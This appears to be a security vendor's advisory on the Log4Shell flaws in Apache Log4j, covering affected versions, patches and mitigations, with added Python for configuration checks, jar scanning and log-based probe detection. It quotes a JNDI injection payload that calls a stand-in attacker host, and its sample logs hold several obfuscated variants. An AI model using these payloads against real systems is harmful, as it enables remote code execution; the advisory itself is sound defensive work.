
UPDATED FLASH ALERT: Apache Log4shell Remote Code Execution Vulnerability

Updated Information to Apache Log4shell Remote Code Execution Vulnerability

Event Summary

Security On-Demand’s Threat Recon Unit continues to track the development of the Log4Shell vulnerability in Log4j, a nearly ubiquitous Java logging library bundled with Java applications and appliances on Linux/Unix and other platforms. As the community predicted, the vulnerability has been rapidly weaponized. Initial attacks mainly consisted of dropping XMRig cryptocurrency miners, but APTs, initial-access brokers, and at least one ransomware group have since been observed exploiting Log4Shell against organizations. Furthermore, some initial mitigations and the 2.15.0 patch can be bypassed in certain configurations to execute remote code or create a Denial of Service (DoS) condition.

Details

CVE-2021-45046 – MITRE CVE Listing

The fix shipped in 2.15.0 was found to be incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), an attacker who controls data placed in the Thread Context Map (for example, a logged request attribute) can supply a crafted value containing a JNDI lookup, resulting in a Denial of Service (DoS) condition. Apache has since reassessed CVE-2021-45046 as also permitting remote code execution in some environments.

Additionally, the previously recommended mitigation of setting log4j2.formatMsgNoLookups to “true” does not cover this case: the property only disables lookups inside the log message itself, not lookups performed by the Pattern Layout, so it does not protect against remote code execution or DoS under these configurations.
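To check a deployment for the configurations CVE-2021-45046 targets, the following added Python example (not code from the original alert or from Apache) parses a constructed log4j2.xml, flags every PatternLayout whose pattern uses a Context Lookup ($${ctx:...}) or a Thread Context Map pattern (%X, %mdc, %MDC), and combines that with the installed log4j-core version to decide whether the host is still exposed. The sample configuration, its appender names and the function names are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Constructed log4j2.xml for illustration (not a real deployment). The
# "Audit" and "Mdc" appenders use the Thread Context patterns that
# CVE-2021-45046 targets; "Plain" does not.
SAMPLE_LOG4J2_XML = """<Configuration status="WARN">
  <Appenders>
    <Console name="Plain" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{ISO8601} [%t] %-5level %logger{36} - %msg%n"/>
    </Console>
    <RollingFile name="Audit" fileName="audit.log" filePattern="audit-%i.log">
      <PatternLayout pattern="%d %p user=$${ctx:loginId} %X{requestId} %m%n"/>
    </RollingFile>
    <Console name="Mdc" target="SYSTEM_OUT">
      <PatternLayout>
        <Pattern>%d %p %mdc{sessionId} %m%n</Pattern>
      </PatternLayout>
    </Console>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="Plain"/>
      <AppenderRef ref="Audit"/>
      <AppenderRef ref="Mdc"/>
    </Root>
  </Loggers>
</Configuration>
"""

CTX_LOOKUP = re.compile(r"\$\$?\{ctx:")           # $${ctx:loginId} / ${ctx:loginId}
THREAD_CTX_MAP = re.compile(r"%(?:X|mdc|MDC)\b")  # %X{key}, %mdc{key}, %MDC{key}


def _pattern_text(layout):
    """PatternLayout takes its pattern as an attribute or a <Pattern> child."""
    if layout.get("pattern") is not None:
        return layout.get("pattern")
    child = layout.find("Pattern")
    return child.text.strip() if child is not None and child.text else ""


def find_risky_patterns(xml_text):
    """(appender name, pattern, reasons) for every PatternLayout whose pattern
    pulls data from the Thread Context, the precondition for CVE-2021-45046."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    hits = []
    for layout in root.iter("PatternLayout"):
        pattern = _pattern_text(layout)
        reasons = []
        if CTX_LOOKUP.search(pattern):
            reasons.append("ctx-lookup")
        if THREAD_CTX_MAP.search(pattern):
            reasons.append("thread-context-map")
        if reasons:
            appender = parent_of[layout]
            hits.append((appender.get("name", appender.tag), pattern, reasons))
    return hits


def _numeric_version(version):
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)   # "2.0-beta9" -> (2, 0, 0)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def still_exposed(log4j_version, hits):
    """CVE-2021-45046 affects 2.0-beta9..2.12.1 and 2.13.0..2.15.0, and only
    matters when such a pattern is in use; 2.12.2 and 2.16.0+ are fixed."""
    v = _numeric_version(log4j_version)
    if v is None or not hits:
        return False
    return (2, 0, 0) <= v <= (2, 12, 1) or (2, 13, 0) <= v <= (2, 15, 0)


if __name__ == "__main__":
    found = find_risky_patterns(SAMPLE_LOG4J2_XML)
    for name, pattern, reasons in found:
        print(f"{name}: {reasons} in {pattern!r}")
    print("still exposed on 2.15.0:", still_exposed("2.15.0", found))
```

Run it against each log4j2.xml (or the equivalent properties/YAML configuration, which this parser does not cover) shipped with an application; a hit on a 2.15.0 install means the upgrade to 2.16.0 is not optional for that host.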

Affected Versions:

CVE-2021-45046 – Denial of Service (DoS) Vulnerability – All versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0

CVE-2021-44228 – Remote Code Execution – All versions of Log4j from 2.0-beta9 to 2.14.1.

Recommendations and Mitigations for Log4shell Remote Code Execution Vulnerability

CVE-2021-45046 – Denial of Service (DoS) Vulnerability

  • Update to version 2.16.0 (Java 8 and later); Java 7 users should update to version 2.12.2
  • Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class (run this against every copy of log4j-core, including jars nested inside WAR/EAR/fat-jar archives, and confirm with unzip -l that the class is gone)

CVE-2021-44228 – Remote Code Execution Vulnerability

  • Update to version 2.15.0 or later; 2.16.0 is recommended, since 2.15.0 remains affected by CVE-2021-45046 above
  • Remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  • Java 7 users should upgrade to version 2.12.2.
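Whether the class-removal mitigation has actually been applied everywhere is the question a responder needs answered, and a single zip -d on one file does not reach copies of log4j-core packed inside WAR, EAR or fat-jar archives. The following added Python example (not code from the original alert or from Apache) builds a constructed directory tree of placeholder jars, inventories every archive recursively for JndiLookup.class together with the log4j-core version read from its Maven pom.properties, and removes the class from a top-level jar the way zip -q -d does. The fixture paths, the placeholder class bytes and the function names are assumptions made for illustration.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def _log4j_version(zf):
    """log4j-core version from the Maven pom.properties it ships, if present."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def _scan_bytes(data, label, findings):
    """Inspect one archive held in memory and recurse into archives nested
    inside it, so jars packed into WAR/EAR/fat jars are not missed."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = zf.namelist()
        if JNDI_LOOKUP in names:
            findings.append((label, _log4j_version(zf)))
        for inner in names:
            if inner.lower().endswith(ARCHIVE_SUFFIXES):
                _scan_bytes(zf.read(inner), f"{label}!{inner}", findings)


def find_jndi_lookup(root):
    """[(archive label, log4j-core version or None)] for every archive under
    root, nested ones included, that still contains JndiLookup.class."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            _scan_bytes(path.read_bytes(), str(path), findings)
    return findings


def remove_jndi_lookup(jar_path):
    """Rewrite a top-level jar without JndiLookup.class (what zip -q -d does).
    Nested jars must be extracted, fixed and repacked separately.
    Returns True if the class was present and has been removed."""
    jar_path = Path(jar_path)
    tmp_path = jar_path.parent / (jar_path.name + ".tmp")
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp_path, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_LOOKUP:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))
    os.replace(tmp_path, jar_path)
    return removed


def _write_jar(target, version):
    """Constructed placeholder jar: a real log4j-core jar has many more
    entries; only the two files the scanner looks at are emulated."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version:
            zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe placeholder, not bytecode")


def build_sample_tree(root):
    """Constructed fixture (assumed layout): one top-level log4j-core jar,
    one nested inside a WAR, and an unrelated jar without the class."""
    lib = Path(root) / "lib"
    lib.mkdir(parents=True, exist_ok=True)
    _write_jar(lib / "log4j-core-2.14.1.jar", "2.14.1")
    _write_jar(lib / "other-lib-1.0.jar", None)
    nested = io.BytesIO()
    _write_jar(nested, "2.15.0")
    with zipfile.ZipFile(Path(root) / "ROOT.war", "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", nested.getvalue())


def demo():
    """Scan, remediate the top-level jar, rescan; the nested copy remains."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        before = find_jndi_lookup(root)
        removed = remove_jndi_lookup(Path(root) / "lib" / "log4j-core-2.14.1.jar")
        after = find_jndi_lookup(root)
    return {"before": sorted(v for _, v in before),
            "removed": removed,
            "after": sorted(v for _, v in after)}


if __name__ == "__main__":
    print(demo())
```

The second scan still reporting the 2.15.0 copy inside ROOT.war is the point: the inventory, not the removal command, is what tells you the mitigation is complete, and it has to be rerun after every deployment that might reintroduce a bundled log4j-core.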

SOD Actions

The Security On-Demand Threat Recon Unit will continue to monitor these events and provide relevant updates. At this time, SOD recommends applying vendor patches immediately.

If you have any questions about this alert, please contact your Security On-Demand Customer Success Manager.

Resources

Log4j Security Vulnerabilities – Apache Security Advisory

2.16.0 Released – Vendor Patches

CISA Log4j Vulnerability Guidance – CISA information


Original Flash Alert from Friday, December 12, 2021

Event Summary

A critical-rated (CVSS 10.0) vulnerability has been disclosed in Apache Log4j, a widely used Java logging library. Initially reported by the Alibaba Cloud Security Team, CVE-2021-44228 allows an unauthenticated attacker to inject a crafted string into any input that a vulnerable application logs, resulting in remote code execution. Open source intelligence (OSINT) sources report mass internet scanning for vulnerable hosts, likely indicating the start of exploitation campaigns. Immediate patching is advised.

Details

CVE-2021-44228 – MITRE CVE Listing

Apache Log4j 2 versions up to and including 2.14.1 perform Java Naming and Directory Interface (JNDI) lookups on attacker-controlled strings: when a logged message contains a ${jndi:...} lookup, Log4j resolves it and contacts the LDAP (or other JNDI-reachable) server named in the string. Because applications routinely log attacker-controlled input such as HTTP headers, a threat actor can place the payload in, for example, the User-Agent header of a request to the vulnerable host:

${jndi:ldap://attacker.com/a}

When the request is logged, the vulnerable host connects to attacker.com over LDAP, and the JNDI reference returned in the response causes the JVM to load and execute Java code the attacker has staged, giving remote code execution (RCE) as the application's user.
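Detecting this probe in web server logs has to account for the nested-lookup and URL-encoding tricks attackers use to evade a naive grep for ${jndi:. The following added Python example (not code from the original alert) normalizes each line by URL-decoding it and collapsing the obfuscation lookups Log4j would evaluate (lower:, upper:, and the :- default syntax) innermost-first, then flags any line that still contains a ${jndi: lookup. The log lines, addresses and hostnames are constructed samples, and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Lines 2-5 carry
# probes in progressively more obfuscated forms; lines 1 and 6 are benign.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.23 - - [10/Dec/2021:14:02:16 +0000] "GET /?x=${${lower:j}ndi:${lower:l}${lower:d}ap://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.24 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NOPE:-j}ndi:${::-r}mi://attacker.example/c}"',
    '198.51.100.25 - - [10/Dec/2021:14:02:18 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 612 "-" "python-requests/2.26"',
    '192.0.2.9 - - [10/Dec/2021:14:02:19 +0000] "GET /docs/${version} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# An innermost ${...} lookup: its body contains no further "${" and no "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Once obfuscation is collapsed, any surviving jndi: lookup is the indicator.
# Log4j lower-cases the lookup name, so ${JNDI:...} works for the attacker too.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j would for the three
    constructs attackers nest around jndi:; anything else is left intact."""
    body = match.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return match.group(0)                 # the thing we are hunting for
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                          # ${env:UNSET:-j} and ${::-j} -> "j"
        return body.split(":-", 1)[1]
    return match.group(0)                     # unknown lookup, e.g. ${version}


def normalize_lookups(text, max_rounds=20):
    """URL-decode, then collapse obfuscation lookups innermost-first until the
    string stops changing. max_rounds bounds deliberately pathological input."""
    text = unquote(text)                      # %24%7B -> ${
    for _ in range(max_rounds):
        new = _INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def find_log4shell_probes(lines):
    """(line number, normalized line) for every line that still contains a
    ${jndi: lookup after de-obfuscation."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


if __name__ == "__main__":
    for n, norm in find_log4shell_probes(SAMPLE_LOG_LINES):
        print(f"line {n}: {norm}")
```

Feed it the raw access log rather than a pre-filtered one: the payload can arrive in any field the application logs (User-Agent, X-Forwarded-For, query strings, usernames), and a hit tells you only that a probe arrived, not that the host was vulnerable; follow up by checking for outbound LDAP/RMI connections from that host around the same timestamp.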

Affected Versions:

All versions of Log4j from 2.0-beta9 to 2.14.1.

Recommendations and Mitigations

Apache has issued a security advisory and released patch version 2.15.0.

In versions 2.10 and later, Log4Shell can also be mitigated by setting the system property log4j2.formatMsgNoLookups to “true” (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to “true”); in versions from 2.0-beta9 through 2.10.0, the mitigation is to remove the JndiLookup class from the classpath. (See the update above: the formatMsgNoLookups mitigation has since been found insufficient.)

SOD Actions

The Security On-Demand Threat Recon Unit will continue to monitor these events and provide relevant updates. At this time, SOD recommends applying vendor patches immediately.

If you have any questions about this alert, please contact your Security On-Demand Customer Success Manager.

Resources

Log4j Security Vulnerabilities – Apache Security Advisory

2.15.0 Released – Vendor Patches

Log4Shell: RCE 0-day explo… – OSINT Analysis
